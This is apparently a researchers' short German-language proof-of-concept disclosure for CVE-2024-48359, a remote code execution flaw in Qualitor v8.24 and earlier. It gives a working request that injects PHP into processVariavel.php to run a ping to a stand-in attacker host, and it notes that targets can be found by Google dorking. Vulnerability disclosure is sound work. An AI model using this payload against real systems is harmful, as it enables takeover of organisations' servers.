
CVE-2024-48359 PoC
CVE-2024-48359 | Qualitor <= v8.24 RCE
Qualitor ist eine Plattform für das Geschäftsprozessmanagement, und dieses System ist in verschiedenen Unternehmen in Brasilien vorhanden, die einfach durch Google Dorking identifiziert werden können.
Unser Team hat eine Schwachstelle in der Anwendung identifiziert, die anfällig für Remote Code Execution (RCE) ist, was die ferngesteuerte Ausführung von Systembefehlen ermöglicht.
Dies ist ein Bypass für den Fix von CVE-2023-47253.
Senden Sie einfach einen PHP-Code auf der Seite processVariavel.php, z.B.: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

https://www.linkedin.com/in/xvinicius/
https://www.linkedin.com/in/hairrison-wenning-4631a4124/